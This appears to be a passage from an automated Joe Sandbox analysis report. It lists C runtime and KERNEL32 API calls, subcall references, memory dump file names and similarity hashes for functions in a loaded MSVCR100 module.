                                                                                                          • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6FDB8F6F
                                                                                                            • Part of subcall function 6FDF35FA: ?_Copy_str@exception@std@@AAEXPBD@Z.MSVCR100(6FDC2115,?,?,6FDC2115,6FDC1F83,?,6FDC1F83,00000001), ref: 6FDF3615
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20C2C), ref: 6FDB8F84
                                                                                                          • ??0invalid_operation@Concurrency@@QAE@XZ.MSVCR100 ref: 6FDB8FA2
                                                                                                          • SetEvent.KERNEL32(?), ref: 6FDB8FED
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??0exception@std@@??0invalid_operation@Concurrency@@Copy_str@exception@std@@EventExceptionThrow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3020611386-0
                                                                                                          • Opcode ID: 0febf3ae29b5b64bb5c01456b0786c7fe90e203ccac01f990ccc7d398a6fd4dc
                                                                                                          • Instruction ID: f32c02a5c2d8240f0b4e9b798464e9c077165eec8d28b083ef63c07dad24f31e
                                                                                                          • Opcode Fuzzy Hash: 0febf3ae29b5b64bb5c01456b0786c7fe90e203ccac01f990ccc7d398a6fd4dc
                                                                                                          • Instruction Fuzzy Hash: A2117CB5900204EFCB44DF68C88198E7BB9EF49365B11816AED169F251DB30FA42CBE1
                                                                                                          APIs
                                                                                                          • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6FDC2203
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20DC8), ref: 6FDC2218
                                                                                                          • ??0invalid_scheduler_policy_thread_specification@Concurrency@@QAE@XZ.MSVCR100 ref: 6FDC223E
                                                                                                          • ??0invalid_scheduler_policy_value@Concurrency@@QAE@XZ.MSVCR100 ref: 6FDC2257
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Concurrency@@$??0exception@std@@??0invalid_scheduler_policy_thread_specification@??0invalid_scheduler_policy_value@ExceptionThrow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1930344252-0
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDDE162
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDDE16D
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100 ref: 6FDDE17E
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDDE189
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                          • String ID:
                                                                                                          • API String ID: 1328987296-0
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDDE2EA
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDDE2F5
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100 ref: 6FDDE306
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDDE311
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                          • String ID:
                                                                                                          • API String ID: 1328987296-0
                                                                                                          APIs
                                                                                                          • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6FDC2173
                                                                                                            • Part of subcall function 6FDF35FA: ?_Copy_str@exception@std@@AAEXPBD@Z.MSVCR100(6FDC2115,?,?,6FDC2115,6FDC1F83,?,6FDC1F83,00000001), ref: 6FDF3615
                                                                                                          • _CxxThrowException.MSVCR100(6FDB3A50,6FE20DAC,?), ref: 6FDC2188
                                                                                                          • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(?,6FDB3A50,6FE20DAC,?), ref: 6FDC2190
                                                                                                          • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6FDC21BD
                                                                                                          Similarity
                                                                                                          • API ID: ??0exception@std@@Policy$Concurrency@@Copy_str@exception@std@@ElementExceptionKey@2@@Policy@SchedulerThrowValue@
                                                                                                          • String ID:
                                                                                                          • API String ID: 1121527890-0
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDF698D
                                                                                                          • _aligned_msize.MSVCR100(?,?,?), ref: 6FDF69B2
                                                                                                          • _aligned_offset_realloc.MSVCR100(?,?,?,?), ref: 6FDF69C6
                                                                                                          • memset.MSVCR100(00000000,00000000,?), ref: 6FDF69E1
                                                                                                          Similarity
                                                                                                          • API ID: _aligned_msize_aligned_offset_realloc_errnomemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 3881611735-0
                                                                                                          APIs
                                                                                                          • _fileno.MSVCR100(?,?,00000001,?,?,6FD91EDE,?,?,?,6FD91F00,0000000C), ref: 6FD91F61
                                                                                                          • _lseek.MSVCR100(00000000,?,00000001,?,?,6FD91EDE,?,?,?,6FD91F00,0000000C), ref: 6FD91F68
                                                                                                          • _errno.MSVCR100(?,?,6FD91EDE,?,?,?,6FD91F00,0000000C), ref: 6FDA8D1F
                                                                                                          • _ftell_nolock.MSVCR100(?,?,?,6FD91EDE,?,?,?,6FD91F00,0000000C), ref: 6FDA8D33
                                                                                                            • Part of subcall function 6FD8A595: _fileno.MSVCR100(?,?,?,?,?,?,?,6FD8A830,?), ref: 6FD8A5C4
                                                                                                            • Part of subcall function 6FD8A595: _write.MSVCR100(00000000,?,?,?,?,?,?,6FD8A830,?), ref: 6FD8A5CB
                                                                                                          Similarity
                                                                                                          • API ID: _fileno$_errno_ftell_nolock_lseek_write
                                                                                                          • String ID:
                                                                                                          • API String ID: 2052885585-0
                                                                                                          APIs
                                                                                                          Similarity
                                                                                                          • API ID: _errno_msizememsetrealloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1716158884-0
                                                                                                          APIs
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfomemcpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 2912778842-0
                                                                                                          APIs
                                                                                                          • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6FDB874A
                                                                                                            • Part of subcall function 6FDF35FA: ?_Copy_str@exception@std@@AAEXPBD@Z.MSVCR100(6FDC2115,?,?,6FDC2115,6FDC1F83,?,6FDC1F83,00000001), ref: 6FDF3615
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20C2C), ref: 6FDB875F
                                                                                                          • TlsGetValue.KERNEL32(?), ref: 6FDB8770
                                                                                                          • ??0invalid_operation@Concurrency@@QAE@XZ.MSVCR100 ref: 6FDB8788
                                                                                                          Similarity
                                                                                                          • API ID: ??0exception@std@@??0invalid_operation@Concurrency@@Copy_str@exception@std@@ExceptionThrowValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 4168700383-0
                                                                                                          APIs
                                                                                                            • Part of subcall function 6FDC0376: TlsGetValue.KERNEL32(6FDC5BA3,?,00000000,?,6FDB5C77,00000001), ref: 6FDC037C
                                                                                                          • SetEvent.KERNEL32(?), ref: 6FDB8CE0
                                                                                                          • ??0context_unblock_unbalanced@Concurrency@@QAE@XZ.MSVCR100 ref: 6FDB8CF2
                                                                                                            • Part of subcall function 6FDB6B38: memset.MSVCR100(?,00000000,0000003E,00000002,?), ref: 6FDB6B57
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20C80), ref: 6FDB8D00
                                                                                                          • ??0context_self_unblock@Concurrency@@QAE@XZ.MSVCR100 ref: 6FDB8D08
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Concurrency@@$??0context_self_unblock@??0context_unblock_unbalanced@EventExceptionThrowValuememset
                                                                                                          • String ID:
                                                                                                          • API String ID: 1089900613-0
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDDA6D6
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDDA6E1
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • GetLocalTime.KERNEL32(?), ref: 6FDDA6EE
                                                                                                          • _mktime32.MSVCR100(?), ref: 6FDDA72F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LocalTime_errno_invalid_parameter_invalid_parameter_noinfo_mktime32
                                                                                                          • String ID:
                                                                                                          • API String ID: 2934371717-0
                                                                                                          APIs
                                                                                                          • ?GetSharedTimerQueue@details@Concurrency@@YAPAXXZ.MSVCR100(?,00000000), ref: 6FDB7E10
                                                                                                            • Part of subcall function 6FDB7413: CreateTimerQueue.KERNEL32(00000001,?,?,00000000,?,00000000,32054ECC,00000000,?,?), ref: 6FDB743B
                                                                                                            • Part of subcall function 6FDB7413: ??0exception@std@@QAE@ABQBDH@Z.MSVCR100(?,00000001,00000001,?,?,00000000), ref: 6FDB7494
                                                                                                            • Part of subcall function 6FDB7413: _CxxThrowException.MSVCR100(32054ECC,6FD8C888,?,00000001,00000001,?,?,00000000), ref: 6FDB74A9
                                                                                                          • GetLastError.KERNEL32 ref: 6FDB7E1D
                                                                                                          • ?GetSharedTimerQueue@details@Concurrency@@YAPAXXZ.MSVCR100(?,00000000), ref: 6FDB7E2F
                                                                                                          • DeleteTimerQueueTimer.KERNEL32(00000000,?,00000000), ref: 6FDB7E35
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Timer$Concurrency@@QueueQueue@details@Shared$??0exception@std@@CreateDeleteErrorExceptionLastThrow
                                                                                                          • String ID:
                                                                                                          • API String ID: 500278849-0
                                                                                                          APIs
                                                                                                            • Part of subcall function 6FDC0376: TlsGetValue.KERNEL32(6FDC5BA3,?,00000000,?,6FDB5C77,00000001), ref: 6FDC037C
                                                                                                          • ??0improper_scheduler_attach@Concurrency@@QAE@XZ.MSVCR100(?,00000000,?,?,?,00000000), ref: 6FDC0AA0
                                                                                                            • Part of subcall function 6FDB8154: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(00000000,00000000,?,?,6FDC0AA5,?), ref: 6FDB8168
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20D68,?,00000000,?,?,?,00000000), ref: 6FDC0AAE
                                                                                                            • Part of subcall function 6FD986E8: RaiseException.KERNEL32(?,?,6FDAF30F,?,?,?,?,?,6FDAF30F,?,6FD8C888,6FE28518), ref: 6FD98727
                                                                                                          • TlsSetValue.KERNEL32(00000000), ref: 6FDC0AC9
                                                                                                          • TlsSetValue.KERNEL32(00000000,?,?,?,00000000), ref: 6FDC0AF4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Value$Exception$??0exception@std@@??0improper_scheduler_attach@Concurrency@@RaiseThrow
                                                                                                          • String ID:
                                                                                                          • API String ID: 561681975-0
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?,?,6FDFC42B,00000000,?,00000000), ref: 6FDFE48D
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,6FDFC42B,00000000,?,00000000), ref: 6FDFE497
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • mbstowcs_s.MSVCR100(00000000,?,?,00000000,000000FF,?,?,6FDFC42B,00000000,?,00000000), ref: 6FDFE4B8
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDFE4D3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_invalid_parameter_noinfo_invoke_watsonmbstowcs_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 2134552197-0
                                                                                                          APIs
                                                                                                          • ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR100(?), ref: 6FDC8FAF
                                                                                                            • Part of subcall function 6FDB5B0B: ?_SetSpinCount@?$_SpinWait@$00@details@Concurrency@@QAEXI@Z.MSVCR100(00000FA0), ref: 6FDB5B27
                                                                                                          • SetEvent.KERNEL32(?), ref: 6FDC8FC7
                                                                                                          • InterlockedPushEntrySList.KERNEL32(?,?), ref: 6FDC8FE3
                                                                                                          • SetEvent.KERNEL32(?), ref: 6FDC9002
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Spin$Concurrency@@EventWait@$00@details@$Count@?$_EntryInterlockedListOnce@?$_Push
                                                                                                          • String ID:
                                                                                                          • API String ID: 1722554412-0
                                                                                                          APIs
                                                                                                          • _lock.MSVCR100(00000000,6FDFB0A0,00000010), ref: 6FDFB00D
                                                                                                            • Part of subcall function 6FD80910: EnterCriticalSection.KERNEL32(00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD8092B
                                                                                                          • DecodePointer.KERNEL32(6FDFB0A0,00000010), ref: 6FDFB026
                                                                                                          • DecodePointer.KERNEL32(6FDFB0A0,00000010), ref: 6FDFB043
                                                                                                          • _encoded_null.MSVCR100 ref: 6FDFB05C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DecodePointer$CriticalEnterSection_encoded_null_lock
                                                                                                          • String ID:
                                                                                                          • API String ID: 2803190587-0
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(00000000,00000000,?,6FDD2A8B,?,000000FF,?,00000000,00000000), ref: 6FDD2922
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000,00000000,?,6FDD2A8B,?,000000FF,?,00000000,00000000), ref: 6FDD292D
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • free.MSVCR100(00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6FDD2971
                                                                                                          • free.MSVCR100(00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6FDD2979
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: free$_errno_invalid_parameter_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 4554520-0
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?,?,?,6FDFDAC9,00000000,?,00000000), ref: 6FDFEE6E
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,6FDFDAC9,00000000,?,00000000), ref: 6FDFEE78
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • strncpy_s.MSVCR100(?,?,00000000,?,?,?,?,6FDFDAC9,00000000,?,00000000), ref: 6FDFEE9C
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDFEEAD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          APIs
                                                                                                          • GetEnvironmentStringsW.KERNEL32(00000000,6FDB0857,?,00000000,?,6FD90D27,?,6FD90D48,0000000C), ref: 6FD92362
                                                                                                          • _malloc_crt.MSVCR100(00000002,?,?,?,6FD90D27,?,6FD90D48,0000000C), ref: 6FD92391
                                                                                                          • memcpy.MSVCR100(00000000,00000000,00000002,?,?,?,6FD90D27,?,6FD90D48,0000000C), ref: 6FD923A0
                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,6FD90D27,?,6FD90D48,0000000C), ref: 6FD923A9
                                                                                                          APIs
                                                                                                          • __p__iob.MSVCR100(6FDD6F80,00000010,6FDD6FB4,Function_0007C71D,?,?,?,?,6FDD5660,?,?,?), ref: 6FDD6F00
                                                                                                          • _errno.MSVCR100(6FDD6F80,00000010,6FDD6FB4,Function_0007C71D,?,?,?,?,6FDD5660,?,?,?), ref: 6FDD6F17
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDD6F80,00000010,6FDD6FB4,Function_0007C71D,?,?,?,?,6FDD5660,?,?,?), ref: 6FDD6F22
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _lock_file.MSVCR100(00000020,6FDD6F80,00000010,6FDD6FB4,Function_0007C71D,?,?,?,?,6FDD5660,?,?,?), ref: 6FDD6F2D
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FDD43F0,0000000C), ref: 6FDD4382
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDD43F0,0000000C), ref: 6FDD438D
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _lock_file.MSVCR100(?,6FDD43F0,0000000C), ref: 6FDD43AB
                                                                                                          • _fseeki64_nolock.MSVCR100(?,?,?,?,6FDD43F0,0000000C), ref: 6FDD43BF
                                                                                                          APIs
                                                                                                          • _lock_file.MSVCR100(?,6FD91F00,0000000C), ref: 6FD91EC8
                                                                                                            • Part of subcall function 6FD8A48D: _lock.MSVCR100(?,?,?,6FDD6E10,00000040,6FDD6E48,0000000C,6FDA8676,00000000,?), ref: 6FD8A4BA
                                                                                                          • _fseek_nolock.MSVCR100(?,?,?,6FD91F00,0000000C), ref: 6FD91ED9
                                                                                                            • Part of subcall function 6FD91F1C: _fileno.MSVCR100(?,?,00000001,?,?,6FD91EDE,?,?,?,6FD91F00,0000000C), ref: 6FD91F61
                                                                                                            • Part of subcall function 6FD91F1C: _lseek.MSVCR100(00000000,?,00000001,?,?,6FD91EDE,?,?,?,6FD91F00,0000000C), ref: 6FD91F68
                                                                                                            • Part of subcall function 6FD91E94: _unlock_file.MSVCR100(?,6FD91EF0), ref: 6FD91E97
                                                                                                          • _errno.MSVCR100(6FD91F00,0000000C), ref: 6FDA8D64
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FD91F00,0000000C), ref: 6FDA8D6F
                                                                                                          APIs
                                                                                                          • _lock.MSVCR100(00000007,6FD920C8,0000000C), ref: 6FD92091
                                                                                                            • Part of subcall function 6FD80910: EnterCriticalSection.KERNEL32(00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD8092B
                                                                                                            • Part of subcall function 6FD921F3: wcsnlen.MSVCR100(?,00007FFF,?,?,?,00000007,00000007,?,6FD920A6,?,?,6FD920C8,0000000C), ref: 6FD9221D
                                                                                                            • Part of subcall function 6FD921F3: wcsnlen.MSVCR100(?,00007FFF,?,00007FFF,?,?,?,00000007,00000007,?,6FD920A6,?,?,6FD920C8,0000000C), ref: 6FD92228
                                                                                                            • Part of subcall function 6FD921F3: _calloc_crt.MSVCR100(00000002,00000002), ref: 6FD92247
                                                                                                            • Part of subcall function 6FD921F3: wcscpy_s.MSVCR100(00000000,00000002,?), ref: 6FD9225E
                                                                                                            • Part of subcall function 6FD921F3: wcscpy_s.MSVCR100(?,00000002,?,00000000,00000002,?), ref: 6FD9227B
                                                                                                            • Part of subcall function 6FD921F3: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6FD922B9
                                                                                                            • Part of subcall function 6FD921F3: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6FD922D5
                                                                                                            • Part of subcall function 6FD921F3: _calloc_crt.MSVCR100(00000000,00000001), ref: 6FD922E2
                                                                                                          • _errno.MSVCR100(6FD920C8,0000000C), ref: 6FDB109A
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FD920C8,0000000C), ref: 6FDB10A4
                                                                                                          • _errno.MSVCR100(6FD920C8,0000000C), ref: 6FDB10B0
                                                                                                            • Part of subcall function 6FD9206A: _unlock.MSVCR100(00000007,6FD920BF,6FD920C8,0000000C), ref: 6FD9206C
                                                                                                          APIs
                                                                                                          • _lock_file.MSVCR100(?,?,?,?,?,?,?,6FD8A8C0,0000000C), ref: 6FD8A891
                                                                                                            • Part of subcall function 6FD8A48D: _lock.MSVCR100(?,?,?,6FDD6E10,00000040,6FDD6E48,0000000C,6FDA8676,00000000,?), ref: 6FD8A4BA
                                                                                                          • _fclose_nolock.MSVCR100(?,?,?,?,?,?,?,6FD8A8C0,0000000C), ref: 6FD8A89C
                                                                                                            • Part of subcall function 6FD8A80F: _fileno.MSVCR100(?,?,?), ref: 6FD8A839
                                                                                                            • Part of subcall function 6FD8A80F: _close.MSVCR100(00000000,?,?,?), ref: 6FD8A83F
                                                                                                            • Part of subcall function 6FD8A8DC: _unlock_file.MSVCR100(?,6FD8A8B1,?,?,?,?,?,?,6FD8A8C0,0000000C), ref: 6FD8A8DD
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,6FD8A8C0,0000000C), ref: 6FDA8BC3
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,6FD8A8C0,0000000C), ref: 6FDA8BCE
                                                                                                          Memory Dump Source
